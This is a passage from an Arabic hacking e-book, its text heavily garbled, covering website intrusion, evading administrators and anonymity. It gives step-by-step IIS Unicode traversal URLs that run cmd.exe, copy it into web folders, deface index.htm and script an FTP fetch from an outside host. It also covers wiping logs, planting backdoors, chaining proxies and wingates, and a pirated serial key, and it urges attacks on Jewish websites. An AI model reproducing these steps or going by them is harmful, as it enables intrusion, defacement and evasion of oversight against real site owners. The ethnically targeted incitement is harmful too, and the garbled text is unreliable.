اروع كتاب عن الهكر 400 صفحة عربي

‫المحتويات‬ ‫المقدمة‪.‬‬ ‫‪.1‬‬ ‫الفهرس‪.‬‬ ‫‪.2‬‬ ‫مقدمة عامة عن الهاكر‪.‬‬ ‫‪.3‬‬ ‫كيفية البحث في النترنت‪.‬‬ ‫‪.4‬‬ ‫مفاهيم خاصة بشبكات النترنت )الجزء‬ ‫‪.5‬‬ ‫اللول(‪.‬‬ ‫مفاهيم خاصة بشبكات النترنت )الجزء‬ ‫‪.6‬‬ ‫الثاني(‪.‬‬ ‫المن عبر النترنت‪.‬‬ ‫‪.7‬‬ ‫أمن الشبكات‪.‬‬ ‫‪.8‬‬ ‫مصطلحات مهمة للمبتدئين في اختراق‬ ‫‪.9‬‬ ‫المواقع‪.‬‬ ‫‪ .10‬اختراق المواقع للمبتدئين‪.‬‬ ‫‪ .11‬الختراق ببرنامج ‪Webcrack.‬‬ ‫‪ .12‬الختراق ببرنامج ‪MungaBunga.‬‬ ‫‪ .13‬برنامج تدمير المواقع ‪.WinSmurf‬‬ ‫‪ .14‬شرح برنامج ‪ Evil Ping‬لتدمير المواقع‪.‬‬ ‫‪ .15‬برنامج الدرة لتدمير المواقع‪.‬‬ ‫‪ .16‬تدمير المواقع بدلون برامج‪.‬‬ ‫‪ .17‬التلنت‪.‬‬ ‫‪ .18‬معلومات عن ‪.DNS‬‬ ‫‪1‬‬

‫‪ .19‬معلومات عن ‪Routing in the‬‬ ‫‪.Internet‬‬ ‫‪.NETBIOS .1‬‬ ‫‪ .2‬برلوتوكول خدمة ‪.Finger‬‬ ‫‪ Net .3‬شرح مختصر لادارة الشبكة بإستخدام المر‪.‬‬ ‫‪ .4‬شرح الـ‪secure shell.‬‬ ‫‪ .5‬شرح معنى الـ ‪Buffer Overflows.‬‬ ‫‪ .6‬الـ ‪ CGI‬لوعلقتها بالنترنت‪.‬‬ ‫‪ .7‬كيف تحمي نفسك لوتخفي أفعالك؟!‪.‬‬ ‫‪ .8‬كيف تبقى مجهول الهوية في النت )الجزء‬ ‫اللول(؟؟‪.‬‬ ‫‪ .9‬كيف تبقى مجهول الهوية في النت )الجزء‬ ‫الثاني(؟؟‪.‬‬ ‫‪ .10‬برنامج ‪ HTTP Port‬الذي يجعلك تتصفح النت‬ ‫متخفيا!‪.!ً.‬‬ ‫‪ .11‬شرح برنامج ‪NeoTrace.‬‬ ‫‪ .20‬كيفية القيام بجمع المعلومات عن موقع ألو‬ ‫شبكة‪.‬‬ ‫‪ .21‬برنامج عمران سكان للبحث عن الثغرات‪.‬‬ ‫‪ .22‬الختراق عن طريق اليونيكواد )الجزء اللول(‪.‬‬ ‫‪ .23‬الختراق عن طريق اليونيكواد )الجزء‬ ‫الثاني(‪.‬‬ ‫‪2‬‬

‫‪ .24‬معلومات عامة عن كيفية الستفاادة من ثغرات‬ ‫اليونيكواد‪.‬‬ ‫‪ .25‬الدليل الكامل لختراق سيرفر ‪.IIS‬‬ ‫‪ .26‬ادراسة مفصلة لوبعمق في الـ ‪UniCode.‬‬ ‫‪ .27‬تدريب على عملية الختراق بواسطة‬ ‫اليونيكواد‪.‬‬ ‫‪ .28‬شرح مفصل لكيفية اختراق المواقع المجانية‪.‬‬ ‫‪ .29‬ادرس مفصل عن الكوكيز‪.‬‬ ‫‪ .30‬شرح برنامج السطورة ‪God Will‬في‬ ‫تلغيم الصفحات‪.‬‬ ‫‪ .31‬لواداع‪ً.‬ا للبرنامج السطورة لومرحبا ببرنامج‬ ‫‪.NOOP4‬‬ ‫‪ .32‬معلومات مهمة عن المواقع التي تدعم‬ ‫الفرلونت بيج‪.‬‬ ‫‪ .33‬اختراق المواقع التي تدعم الفرلونت بيج‪.‬‬ ‫‪ .34‬الختراق العشوائي‪.‬‬ ‫‪ .35‬الطريقة الصحيحة لوالمثلى في اختراق‬ ‫المواقع‪.‬‬ ‫‪ .36‬نبذه يسيرة لومبسطة عن كيفية اختراق‬ ‫المواقع‪.‬‬ ‫‪>) .37‬س&جمنقول من منتديات شبكة الحز‪.‬م السلمية الكاتب‪ :‬بلك هنتر منقول الكاتب‪ :‬عصا‪.‬م الوقيت منقول من منتدى إعصارالكاتب‪المترهجم‪>>>>>>‬ ‫ال ‪) host name‬اسم الجهاز(‬ ‫القاره‬ ‫الدوله‬ ‫المدينه‬ ‫المتصفح‬ ‫نظا‪.‬م التشغيل‬ ‫ال ‪screen resolution‬‬ ‫الوان الشاشه‬ ‫مزود الخدمه الخاص بك)‪>>>>(ISP‬‬ ‫‪47‬‬

‫هناك ‪ 3‬انواع ‪ log files‬مهمه‪:‬‬ ‫‪ - WTMP‬يسجل كل دتخول\تخروج‪ ،‬مع ميعاد‬ ‫الدتخول\الخروج بالضافه الى ال ‪ host‬و ‪tty‬‬ ‫‪- UTMP‬من ‪ Onlne‬في هذه اللحظه‬ ‫‪- LASLOG‬من اي هجاء الدتخول\تخروج‬ ‫و الكثير الكثير!! لذا لو الدمن اراد ان يلقي نظره‬ ‫عليهم )‪ (log.files‬سوف يوقع بك)‪track you‬‬ ‫‪... (down‬‬ ‫ربما تقول‪ :‬مفيش مشكله انا هاستخد‪.‬م بروكسي! بس‬ ‫ادي حلجه لز‪.‬م تعرفها عن البروكسيهات‬ ‫هجهازك‪ =========================‬ ‫====================================منقول من موقع نورةمنقول من منتديات ابن مصرالكاتب‪منقول من منتديات شبكة الحز‪.‬م السلميةالكاتب‪>.logout 217

‫ امور و اشياء يجب تجنبها و الحظر منها‬‫======================‬ ‫لتقو‪.‬م ابدا بكسر اي باسورد ال على ‪encrypted‬‬ ‫‪ partition‬كما عليك دائما انت تحذر من استخدا‪.‬م‬ ‫اشتراكاتك ) اشتراك الجامعه على سبيل المثال (‬ ‫لنه بمنتهى البساطه يمكن ان يرى ماتفعله مدير‬ ‫الشبكه ‪ admin‬و من ثم سيعرف مالذي تقو‪.‬م به و‬ ‫الملفات التي تستخدمها الخ ‪..‬‬ ‫حاول دائما ان تغيير اسامي البرامج المشبوهه لديك‬ ‫يعني احنا العرب تخصوصا غاويين نسمي اسماء‬ ‫اسامي مخيفه على الفاضي ‪..‬‬ ‫لتفكر في نفسك فقط ‪ ..‬يعني حين ان تستخد‪.‬م بعض‬ ‫الشتراكات او ال ‪ shells‬التي تسمح بالعمل الخلفي‬ ‫‪ background‬لبد ان تعرف انك تبطئ من سرعة‬ ‫السيرفر و بالتالي تلفت النظار !!!‬ ‫حاول ان لتستخد‪.‬م ‪ parametres‬على قدر‬ ‫المستطاع ‪ ...‬على سبيل المثال اذا اردت ان تتصل من‬ ‫الشيل على تيلنت لموقع معين او سيرفر معين لتقو‪.‬م‬ ‫بعمل التي ‪telnet http://www.host.com/ :‬‬ ‫‪ 23‬انما ببساطه اتبع الخطوات البطيئه و هي‬ ‫‪telnet‬‬ ‫‪218‬‬

‫‪open‬‬ ‫‪/http://www.host.com‬‬ ‫و هكذا ‪..‬‬ ‫في حالة انك اتخترقت سيرفر معين من الفضل ان‬ ‫تضع عليه ‪ backdoors‬مخصصه لنظا‪.‬م التشغيل‬ ‫) مش ‪ sub7‬هههههههههه ( و هي كثييره و‬ ‫موهجوده مجانا على النترنت‬ ‫الجزء الرابع ‪ :‬التقنيات الحديثه الي يتي يجب‬ ‫ملحظتها‬ ‫=============================‬ ‫==‬ ‫ تمهيد‬‫*******‬ ‫بعد ان ثبت اول ‪ sniffer‬و تخططت لبدا التختراقات ‪..‬‬ ‫عليك ان تعرف كيف تستخد‪.‬م هذه التقنيات متعبا ما‬ ‫يلي ‪:‬‬ ‫ امنع تقفى اثرك من اي نوع‬‫**********************‬ ‫قد يلحظ الدمين ) مدير الشبكه ( وهجودك كمخترق‬ ‫‪ hacker‬و انك اطحت باحد المواقع لكن هذا ليهم‬ ‫‪ ...‬المهم هو انه كيف سيرصدك و عندها كيف يمكن‬ ‫‪219‬‬

‫ان يتعامل معك !!!‬ ‫لذا ففي هذا الجزء سيتم توضيح كل الحتمالت و‬ ‫الساليب الذي يمكن بها تتبعك و رصدك و ايضا كيف‬ ‫يمكن ان تمنعها ‪...‬‬ ‫* من الطبيعي ) العادي ( ان يسهل على مدير الشكبه‬ ‫) ‪ ( admin‬معرفة النظا‪.‬م الذي كان المخترق عليه‬ ‫عند دتخوله على شبكته و ذلك اما عن طريق ملفات‬ ‫اللوق ) هذا ان كان الهاكر غبي لتركها كما هي ( او‬ ‫من ال ‪ output‬من ال ‪sniffer‬‬ ‫او من اوامر ‪ netstat‬في حالة ان المخترق مازال‬ ‫موهجودا ‪online‬‬ ‫من اهجل هذا تختاج ال ‪!! GateWay Server‬‬ ‫* ‪ A gateway server in between‬هذا‬ ‫واحد من الكثيير من السيرفرات التي يوهجد لك حساب‬ ‫عليها و التي تعتبر في منتهى السخافه في الستخدا‪.‬م‬ ‫و انت تحتاج لن تكون رووت عليها لتستطيع تغيير ال‬ ‫‪wtmp and lastlogs‬‬ ‫كما انه لبد ان من استخدا‪.‬م اكثر من ‪gateway‬‬ ‫‪ server‬و ان تبدل بينهم باستمرار حتى ل يتم‬ ‫الكشف عنك ‪..‬‬ ‫‪220‬‬

‫من الشيل الذي ستخترق منه ‪ ..‬قم بالتصال بال‬ ‫‪ gateway server‬و من ثم تتصل بالسيرفر‬ ‫المراد اتختراقه ‪..‬‬ ‫==< ) تحتاج دائما ل ‪ root access‬لتغيير اللوق‬ ‫(‬ ‫باستخدامك ل ‪ Dialup server‬يجنبك الكثيير من‬ ‫المشاكل ‪ ..‬حيث انك في غنى عن التعديل في ملفات‬ ‫اللوق بشرط ان تدتخل باشتراك مختلف في كل مره‬ ‫تدتخل فيها على ال ‪(= hacked system‬‬ ‫ملحوظه ‪ :‬اذا كنت قادر على التصال بسرفيرات‬ ‫‪ dialup‬كثييره فل حاهجه لن تستخد‪.‬م ‪hacking‬‬ ‫‪ server‬لنه سيتغير اثرك بتغير الشركات المختلفه‬ ‫التي تتصل من تخللها‬ ‫بالنسبه للمتواهجدين في الوليات المتحده المريكيه و‬ ‫اوروبا ) الدول المتقدمه ( حتى و ان قمت بما سبق )‬ ‫‪ ( dialup servers‬يمكنهم تسجيل كل اتصال تم و‬ ‫لديهم ارشيفات منذ سنيين هذا عددها !‬ ‫نتيجه و اتختصار للنقطه السابقه موضحه بالرسم في‬ ‫الصوره التاليه ‪:‬‬ ‫‪221‬‬

‫ ايجاد اي نوع من انواع ملفات اللوق ‪ lOGs‬مهما‬‫كان فيها من تلعب ‪..‬‬ ‫********************************************‬ ‫******‬ ‫***‬ ‫من الها‪.‬م و الضروري هجدا ان تعثر على كل ملفات‬ ‫اللوق حتى المخفي منها ‪ ..‬للحصول و العثور على‬ ‫هذه الملفات يمكن ذلك بهاتين الطريقتين ‪:‬‬ ‫‪ - 1‬اعثر على هجميع الملفات المفتوحه ‪ :‬و يمكنك ذلك‬ ‫باستخدا‪.‬م برنامج ‪ LSOF‬هو اتختصار ‪List Open‬‬ ‫‪ Files‬و من ثم يمكن العثور عليهم و التعديل فيهم‬ ‫‪ - 2‬ابحث عن كل الملفات التي تغيرت ) حدث فيها‬ ‫تغيير ( من بعد دتخولك ‪-‬‬ ‫بعد دتخولك قم بعمل ‪ touch /tmp/check‬و بعدها‬ ‫‪222‬‬

‫قم "‪"find / -newer /tmp/check -print‬‬ ‫العمليه التي سنقو‪.‬م بها ستاذخ الشكل التالي ‪ :‬بحث ‪>>>[Proxy]>>>>>[Web‬‬ ‫‪[Pages‬‬ ‫‪---------------‬‬‫‪Proxy Chaining‬‬ ‫‪---------------‬‬‫معناها عدة بروكسيات وهذي طريقة فعالة هجدا لكي‬ ‫تصبح مجهول الهوية حيث يمكنك ان تتصل بأكثر من‬ ‫بروكسي لكي تعرض موقع واحد‬ ‫مثال‪/‬‬ ‫‪249‬‬

‫]‬ ‫‪User]>>>[Proxy1]>>>[Proxy2]>>>[Pr‬‬ ‫‪[oxy3]>>>[Proxy4]>>>[Destination‬‬ ‫يوضح هذا المثال ان المستخد‪.‬م اول عليه التصال‬ ‫بالبروكسي الول فالثاني فالثالث والرابع وأتخيرا‬ ‫الهدف مما يسبب بطأ في التصال‬ ‫‪Destination = web page, Unix‬‬ ‫‪server, ftp server, etc‬‬ ‫إذا ‪ Proxy chaining‬مطلب ضروري لكي‬ ‫يستخدمه أي هكر ليحفظ سريته اثناء الدتخول إلى أي‬ ‫‪ server‬مثل ‪telnet, ftp, or http‬‬ ‫‪ Chaining‬هي مهمة كما أقول لن تصبح مجهول‬ ‫‪ %100‬لكن حاول بقدر المستطاع على ان ل تمسك‬ ‫ويطادونك مثل السمكة لكن البروكسيات المتعددة‬ ‫صعب ان يكشفها احدا لكن مثل حاولت تدتخل على‬ ‫موقع بالـ ‪ ftp‬را ح يصطاد البروكسي بعد كذا لو كان‬ ‫معاه فلوس كان طلب من‬ ‫‪ Adminstrator‬ملفات ‪ Logs‬لكي يعرف‬ ‫المصدر والمصدر ايضا را ح يكون ‪proxy‬‬ ‫ههههههههه يعني على هذا المنوال إلى ان يصل الى‬ ‫المستخد‪.‬م لذلك عملية ‪ Chaining Proxy‬عملية‬ ‫مفيدة هجدا ويصعب احدهم المساك بك‬ ‫‪250‬‬

‫لكن ملفات ‪ Logs‬تنحذف في اوقات بعد الضغط على‬ ‫البروكسي لكي يصل الى الحد المسمو ح به من تحميل‬ ‫الملفات على البروكسي الخاد‪.‬م الي يحتوي على‬ ‫البروكسيات لذلك سوف تصبح ملفات ‪ Logs‬متجددة‬ ‫‪...‬‬ ‫‪---------------‬‬‫‪HTTP Chaining‬‬ ‫‪---------------‬‬‫‪ HTTP chaining‬هي نفس طريقة ‪Proxy‬‬ ‫ويمكنك عملها من مستعرضك وفي تخانة ‪Address‬‬ ‫مثال‪:‬‬ ‫_‪http://proxy.magusnet.com/-‬‬‫‪http://www.google.com‬‬ ‫حركة هجميلة وهجديدة )‪ (-_-‬لم ترونها مسبقا صحيح‬ ‫!!!‬ ‫وأيضا يمكننا استخدا‪.‬م ‪ Chaining‬مثل‪:‬‬ ‫_‪http://proxy.server1.com/-‬‬‫_‪http://proxy.server2.com/-‬‬‫‪http://www.destination.com‬‬ ‫‪251‬‬

‫او يمكننا وضع عناوين بروكسيات بمنافذها‬ ‫‪http://anon.free.anonymizer.com/htt‬‬ ‫‪p://www.google.com‬‬ ‫مثال آتخر‬ ‫كإضافة علمة )‪ (/‬بين المواقع‬ ‫‪http://proxy1/http://proxy2:80/proxy‬‬ ‫‪3:80/http://www.yahoo.com‬‬ ‫‪ = proxy‬استبدله ببروكسي رقمي يكون أفضل لك‬ ‫‪.....‬‬ ‫‪---------------‬‬‫‪Browser Chaining‬‬ ‫‪---------------‬‬‫وهو استخدا‪.‬م البروكسي من متصفحك وانا سوف‬ ‫يكون حديثي فقط عن ‪ Internet Explorer‬لنه‬ ‫الكثر استخداما ‪----‬‬ ‫ألحين مثل عندنا بروكسي‬ ‫‪213.234.124.23:80‬‬ ‫‪252‬‬

‫العنوان‪213.234.124.23:‬‬ ‫المنفذ‪80:‬‬ ‫ألحين كيف نحطها بدال البروكسي الخاص بالـ ‪ISP‬‬ ‫أي مزد تخدمة النترنت‬ ‫نرو ح عند‬ ‫أدوات ‪Tools‬‬ ‫تخيارات إنترنت ‪Internet Options‬‬ ‫بعدين اتصالت ‪Connections‬‬ ‫تختار التصال الي تدتخل في النترنت بعدين‬ ‫إعدادات ‪Settings‬‬ ‫را ح تجد‬ ‫‪) Address‬العنوان(‬ ‫‪) Port‬المنفذ(‬ ‫ونضعه بداله‬ ‫العنوان‪ 213.234.124.23:‬المنفذ‪ 80:‬وبعد كذا‬ ‫اضغط موافق و‬ ‫والحين نبغى نستخد‪.‬م الستعراض المتعدد‬ ‫‪Chaining Proixes‬‬ ‫بدال مانحط بروكسي واحد في العنوان نحط أكثر من‬ ‫واحد مثل كذا‪/‬‬ ‫‪Address: 213.234.124.23:80‬‬ ‫‪253‬‬

‫‪121.172.148.23:80 143.134.54.67‬‬ ‫‪Port: 80‬‬ ‫‪$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$‬‬ ‫‪$$$$$$$$$$$$$$$$$$$‬‬

‫&&&&&&&&&&&&&&‬ ‫‪Wingates‬‬ ‫&&&&&&&&&&&&&&‬ ‫‪ Wingate‬هو ‪ proxy server‬الذي ينزل في‬ ‫هجهازه او هجهازها ليسمح بالفرد او بعدة أفراد ليأتخذون‬ ‫مقاعدهم بالمنفذ تخلل ‪)) 23‬منفذ ‪ Telnet‬العادي ((‬ ‫بعض ‪ Wingates‬يسمحون لي شخص متصل‬ ‫‪ online‬لكي يتصلون به مباشرة او في وقت قصير‬ ‫لتتعدى اليا‪.‬م لكن اعلم ان هذا ليس من القانون‬ ‫وهنالك تخصائص للـ ‪ Admin‬تمنع من استخدا‪.‬م‬ ‫‪ wingate‬على هجهازه هذا على حسب المدير هل‬ ‫يفهم في هذا المجال أ‪.‬م ل !!!!‬ ‫وهي عبارة عن ‪ ip‬أهجهزة أو اسماء أهجهزة تتصل من‬ ‫تخللها على المنفذ ‪ 23‬بأداة ‪ Telnet‬أو يمكنك من‬ ‫عمل بحث ببرامج‬ ‫‪254‬‬

WinScan Wingate

Download ------------------------------Chaining Wingates Using Telnet ------------------------------‫ كالسابق‬Wingate ‫م عدة‬.‫ألحين را ح نستخد‬ ‫والدوات التي نحتاهجها‬ 255

‫هي فقط ‪ DoS‬وأداة ‪ Telnet‬لظن أن الهجهزة‬ ‫سوف تخلو من أهم هذين الداتين إل نادرا ‪.....‬‬ ‫هجميع ‪ wingate‬تتصل عن طريق المنفذ ‪ 23‬لكن‬ ‫المنفذ ليس مهما لكني سوف أضيفها لكم لكي تتعلموا‬ ‫فقط كيف يتم التصال بالـ ‪ Telnet‬عن طريق المنافذ‬ ‫وهذا عنوان هجهاز امكننا إحضاره‬ ‫هو ‪ 61.133.119.130‬ومنفذه ‪23‬‬ ‫ويتم التصال به عن طريق ‪ Telnet‬مثل‪:‬‬ ‫‪C:\WINDOWS>telnet 61.133.119.130‬‬ ‫‪23‬‬ ‫لحظ وهجود المسافات فمسافة زائدة او ناقصة قد تعثر‬ ‫تخطوتك‬ ‫بعد كذا سوف تتصل بالوين هجيت مثل هذا‬ ‫‪Wingate> 203.207.173.166 23‬‬ ‫‪256‬‬

‫بعدين تقدر تكرر العملية اكثر من مرة ولكن مع تغيير‬ ‫العنوان يعني كذا‬ ‫‪Wingate> 213.17.99.45 23‬‬ ‫وأيضا اتصل مرة أتخرى‬ ‫‪Wingate> 10.65.212.7 23‬‬ ‫ألحين بعد ماتتصل بأكثر من ‪ wingate‬اتصل‬ ‫بالموقع‬ ‫‪WinGate>arbornet.org‬‬ ‫اذا الطريقة وبخطوة سريعة تبدو كذلك‬ ‫‪C:\Windows> telnet 61.133.119.130‬‬ ‫‪23‬‬ ‫‪Wingate>203.207.173.166 23‬‬ ‫‪Wingate>135.245.18.167 23‬‬ ‫‪257‬‬

Wingate>m-net.arbornet.org Connecting to host arbornet.org...Connected ،،،‫انتهى‬

258

‫"بين حماية الخصوصية وإزالة‬ ‫الاثارمن ملفات الـ ‪"Logs‬‬ ‫>منقول من منتديات الحز‪.‬م السلميةالكاتب‪ :‬حز‪.‬م الظاميمنقول من منتدى نجم دوسالكاتب‪:‬المدمرمنقولالكاتب‪< DarK_HaCKeR :‬‬ ‫برنامج يكشف كل شي عن صاحب اليبي‬ ‫مرحبا شباب ‪..‬‬ ‫هاذا برنامج ممتاز للكشف عن معلومات الشخص و‬ ‫بلده و كل شيء بس بمجرد معرفة اليبي ماله ‪ ..‬او‬ ‫تريد تعرف معلومات عن موقع معين ‪..‬‬ ‫اسم البرنامج ‪..‬‬ ‫‪Neo Trace Express‬‬ ‫اتفضلوا الوصلة ‪..‬‬ ‫‪http://www.neoworx.com/dow‬‬ ‫‪nload/NTX325.exe‬‬

‫‪291‬‬

292

‫اتمنى ان الشر ح وافي وهذا هو السيريل نمبر ‪:‬‬ ‫‪XDQG-2ZKN-X2PA-KTRQ‬‬ ‫‪293‬‬

‫انتهى‪،،،‬‬

‫" كيفية القيا م بجمع المعلومات عن‬ ‫موقع أو شبكة "‬ ‫>منقول من منتدى إعصارالكاتب‪ :‬المدمرمنقول من عالم الكومبيوترالكاتب‪>P @ LH@CKERZ :‬‬

‫برنامج عمران سكان يعتبر من أفضل برامج كشف‬ ‫الثغرات و ذلك لما يتميز به من سرعه سهولة في‬ ‫‪.‬تغيير ملف الثغرات‬

‫‪306‬‬

‫‪ 1‬اسم الموقع المراد البحث عن ثغرات فيه‬ ‫و ل تنسى ‪//:http‬‬ ‫ملحظه ‪:‬‬ ‫ل تضع \ في نهايه الموقع مثل‬ ‫‪/http://www.XXX.com‬‬ ‫لنه سيضع من عنده ‪ /‬عند تطبيق الثغره‬ ‫‪ 2‬اسم ملف الثغرات‬ ‫‪ 3‬لتغيير ملف الثغرات إلى ملف آتخر‬ ‫‪ 4‬الثغرات الموهجوده في الملف‬ ‫‪ 5‬لبدء الفحص‬ ‫‪ 6‬لليقاف‬ ‫‪ 7‬شاشة العمليات الجاريه من فحص الثغرات على‬ ‫الموقع‬

‫‪307‬‬

‫‪ 8‬الثغرات الموهجوده على الموقع التي نجح اتختبارها‬ ‫‪ 9‬لمسح شاشه العمليات و النتائج لعاده البحث مره‬ ‫اتخرى على ثغرات اتخرى‬ ‫‪ 10‬ال‬ ‫‪ 11‬منفذ ال‬ ‫ملحظ ‪11 10 :‬‬ ‫اذا ما عرفت ال فيجب عليك مسح البيانات‬ ‫‪ 12‬للخروج‬

‫ملحظه هامه ‪:‬‬ ‫ل تنسو المواقع اليهودية التي تنتظر من يخترقها‬ ‫فأرهجو عد‪.‬م استخدامه ضد الموقع العربية او‬ ‫السلمية‪.‬‬

‫‪308‬‬

‫انتهى‪،،،‬‬

‫" الوختراق عن طريق اليوبنيكود‬ ‫)الجزء الول( "‬ ‫>منقولالكاتب‪c:\hEx.txt

316

‫المر المستخد م لعملية سحب أي‬ ‫‪:‬ملف‬ ‫عليك القيا م اول ً بنسخ الملف المراد‬ ‫سحبه الى أي دليل وبعدها يتم كتابة‬ ‫اسم الملف في اوخر العنوان‬ ‫‪:‬كالتالي‬ ‫‪http://www.xxxx.com/msadc‬‬ ‫‪/hEx.mdb‬‬

‫ طريقة تطبيق هذه الثغرات ‪.‬‬‫تطبيق الثغر ة على الموقع من‬ ‫وخلل المتصفح تتم حسب المثلة‬ ‫التالية ‪-:‬‬ ‫‪http://www.xxxx.com/scripts‬‬ ‫‪/..‬‬ ‫‪%c1%1c../winnt/system32/c‬‬ ‫‪\:md.exe?/c+dir+c‬‬ ‫‪http://www.xxxx.com/scripts‬‬ ‫‪/..‬‬ ‫‪317‬‬

%c0%9v../winnt/system32/c \:md.exe?/c+dir+c http://www.xxxx.com/scripts /.. %c0%af../winnt/system32/c \:md.exe?/c+dir+c http://www.xxxx.com/scripts /.. %c0%qf../winnt/system32/c \:md.exe?/c+dir+c http://www.xxxx.com/scripts /.. %c1%8s../winnt/system32/c \:md.exe?/c+dir+c http://www.xxxx.com/scripts /.. %c1%9c../winnt/system32/c \:md.exe?/c+dir+c http://www.xxxx.com/scripts /.. 318

‫‪%c1%pc../winnt/system32/c‬‬ ‫‪\:md.exe?/c+dir +c‬‬ ‫وقد بنحتاج الى تغيير مسمى الدليل‬ ‫بحيث يكون ‪-:‬‬ ‫‪Msadc , _vti_bin , iisadmpwd ,‬‬ ‫‪_vit_admin , scripts ,‬‬ ‫‪samples , cgi-bin‬‬

‫ كيفية اوختصار اثغر ة اليوبنيكود‬‫حتى تتمكن من تفعيل امر الـ‬ ‫‪. ECHO‬‬ ‫في حالة اكتشاف موقع يعابني من‬ ‫مشكلة اليوبنيكود ولنفترض ابنه كان‬ ‫على هذه الثغر ة ‪-:‬‬ ‫‪http://www.xxxx.com/msad‬‬ ‫‪c/..%c0%af../..‬‬ ‫‪%c0%af../winnt/system32/‬‬ ‫‪\:cmd.exe?/c+dir+c‬‬

‫‪319‬‬

‫فنحتاج الى بنسخ ملف‬ ‫‪ w3svc.exe‬الى مجلد‬ ‫‪ inetpub\scripts‬والمر يكون‬ ‫بهذه الطريقة ‪-:‬‬ ‫‪http://www.xxxx.com/msad‬‬ ‫‪c/..%c0%af../..‬‬ ‫‪%c0%af../winnt/system32/‬‬ ‫?‪cmd.exe‬‬ ‫‪c+copy+c:\winnt\system32‬‬ ‫‪\cmd.exe+c:\inetpub\script‬‬ ‫‪s\w3svc.exe‬‬ ‫بعد بنسخ ملف ‪ w3svc.exe‬الى‬ ‫مجلد ‪ ، inetpub\scripts‬الن‬ ‫بنقو م بتصفح الموقع من وخلل‬ ‫الثغر ة بهذه الطريقة ‪-:‬‬ ‫‪http://www.xxxx.com/scrip‬‬ ‫‪\:ts/w3svc.exe?/c+dir+c‬‬ ‫الن بنستطيع الكتابة داوخل أي ملف‬ ‫وبالتحديد الملف الرئيسي للموقع‬ ‫الذي غالبا مايكون في هذا الدليل‬ ‫‪320‬‬

inetpub\wwwroot\index.ht ‫ بحيث يكون المر بالشكل‬m -: ‫التالي‬ http://www.xxxx.com/scrip ts/w3svc.exe?/c+echo+Hac ked+By+sNiper_hEx+hExRa [email protected]+>+c:\inetp ub\wwwroot\index.htm

‫ لتاحة‬CMD ‫ طريقة بنسخ ملف الـ‬. ‫امكابنية الكتابة على الملفات‬ ‫ وهو لعطاء‬CMD ‫الغرض من نسخ ملف الـ‬ ‫امكانية للكتابة داتخل السيرفر في بعض الحالت ويتم‬ -: ‫نسخه الى مجلد السيكربت بهذه الطريقة‬ http://www.xxxx.com/msad c/..%c0%af../.. %c0%af../winnt/system32/ cmd.exe? c+copy+c:\winnt\system32

321

‫‪\cmd.exe+c:\inetpub\script‬‬ ‫‪s\cmd1.exe‬‬ ‫الن بامكاننا استخدا‪.‬م ملف الـ ‪ CMD‬الجديد في‬ ‫الثغرة بدل من الول بهذا الشكل ‪-:‬‬ ‫‪http://www.xxxx.com/msad‬‬ ‫‪c/..%c0%af../..‬‬ ‫‪%c0%af../winnt/system32/‬‬ ‫‪\:cmd1.exe?c+dir+c‬‬

‫ كيفية معرفة مشكلة الـ ‪Access‬‬‫‪ Denied‬والحلول المتبعة لها ‪.‬‬ ‫تتم معرفة مشكلة الـ ‪ Access Denied‬من‬ ‫تخلل المحاولة في حذف أي ملف من أي امتداد ‪،‬‬ ‫فعند ظهور رسالة الـ ‪ Access Denied‬فاليك‬ ‫هذه الطرق حتى تتمكن من الكتابة على الملفات‬ ‫والتحكم اكثر على السيرفر ‪-:‬‬ ‫‪ -1‬الطريقة الولى نسخ ملف الـ ‪ CMD‬الى دليل‬ ‫السيكربت بمسمى ‪ CMD1‬فسوف يتا ح لك‬ ‫امكانية الكتابة باستخدا‪.‬م المر ‪ Copy‬باستخدا‪.‬م‬ ‫هذا المر ‪-:‬‬ ‫‪322‬‬

‫‪http://www.xxxx.com/msad‬‬ ‫‪c/..%c0%af../..‬‬ ‫‪%c0%af../winnt/system32/‬‬ ‫?‪cmd.exe‬‬ ‫‪c+copy+c:\winnt\system32‬‬ ‫‪\cmd.exe+c:\inetpub\script‬‬ ‫‪s\cmd1.exe‬‬ ‫‪ -2‬الطريقة الثانية بالتعامل مع الملف ‪ssinc.dll‬‬ ‫والطريقة كما يلي ‪-:‬‬ ‫‪ o‬اول انشاء صفحة باسم ‪test.shtml‬‬ ‫‪ o‬تكون هذه الصفحة داتخل مجلد‬ ‫‪wwwroot/hEx/test.shtml‬‬ ‫‪ o‬كتابة هذا الكود داتخل الصفحة >!‪#--‬‬ ‫‪+c:\winnt\mspft.ppl ‫ الن مطلوب اضافة مجهول‬-3 ‫ الى نفس الملف الذي قمنا‬Anonymous mspft.pll ‫بانشاءه‬ / shell.exe?/c+echo+anonymo us+>>+c:\winnt\mspft.ppl 325

‫ الن مطلوب ادراج البريد‬-4 ‫ الى نفس‬[email protected] mspft.pll ‫الملف الذي قمنا بانشاءه‬ / shell.exe?/c+echo+hEx@Hot mail.Com+>>+c:\winnt\ms pft.ppl ‫م‬.‫ لزو‬Anonymous ‫ قبل‬User ‫ إضافة‬-5 mspft.pll ‫الملف الذي قمنا بانشاءه‬ / shell.exe?/c+echo+user+an onymous+>>+c:\winnt\msp ft.ppl ‫ الن تكرار لحاهجة العداد‬-6 / shell.exe?/c+echo+hEx@Hot mail.Com+>>+c:\winnt\ms pft.ppl

326

‫يتم هنا ادراج الموقع الحالي‬

‫‪.g‬‬ ‫للملفات‬

‫‪/‬‬ ‫‪shell.exe?/c+echo+lcd+c:\in‬‬ ‫‪etpub\wwwroot+>>+c:\win‬‬ ‫‪nt\mspft.ppl‬‬ ‫‪ -8‬الن يكتب اوامر الـ ‪ FTP‬اللزمة لسحب‬ ‫الملف من تخاد‪.‬م الـ ‪ FTP‬وهي ‪Get‬‬ ‫‪ index.htm‬ثم يدرج هنا بدون المسج السابق‬ ‫‪/‬‬ ‫‪shell.exe?/c+echo+get+inde‬‬ ‫‪x.html+>>+c:\winnt\mspft.‬‬ ‫‪ppl‬‬ ‫‪ -9‬هنا نفس السابق ولكن باضافة ‪Quit‬‬ ‫‪/‬‬ ‫>>‪shell.exe?/c+echo+quit+‬‬ ‫‪+c:\winnt\mspft.ppl‬‬ ‫‪ -10‬الن يتم تنفيذ امر ‪FTP.exe?+"-‬‬ ‫‪ ”s:c:winnt\mspft.ppl‬وهو عبارة عن‬ ‫تخطوات قمنا بانشاءها وموهجودة في ملف‬ ‫‪ mspft.ppl‬باحتوائها على مايلي ‪-:‬‬ ‫‪327‬‬

Open FTP.host.com Anonymous [email protected] User Anonymous [email protected] Get index.html Quit msadc/..%c0%af../../ %c0%af../winnt/system32/ ftp.exe?+""s:c:\winnt\mspft.ppl

